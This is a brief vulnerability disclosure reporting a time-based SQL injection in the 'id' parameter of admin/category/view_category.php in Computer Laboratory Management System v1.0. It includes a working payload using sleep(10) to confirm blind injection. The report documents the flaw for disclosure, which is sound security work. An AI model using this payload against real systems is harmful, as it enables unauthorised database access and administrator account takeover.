BUG_Author: K1ngd0m3
Affected version: Computer Laboratory Management System v1.0
Vendor: https://www.sourcecodester.com/
Vulnerability File: admin/category/view_category.php
Description: computer Laboratory Management System v1.0 is vulnerable to sql injection via admin/category/view_category.php The parameter “id” has not been handled correctly. Hackers can exploit this vulnerability to manipulate the system’s administrator account and gain full control over other user accounts’ information. image As shown in the screenshot, at line 4th of the source code, the parameter “id” has not been properly filtered, resulting in a SQL injection vulnerability.
GET parameter ‘id’ exists SQL injection vulnerability
Payload1:?id=4'and+sleep(10)%23
you can see the server sleep ten seconds in fact ,You can retrieve database data through time-based SQL injection.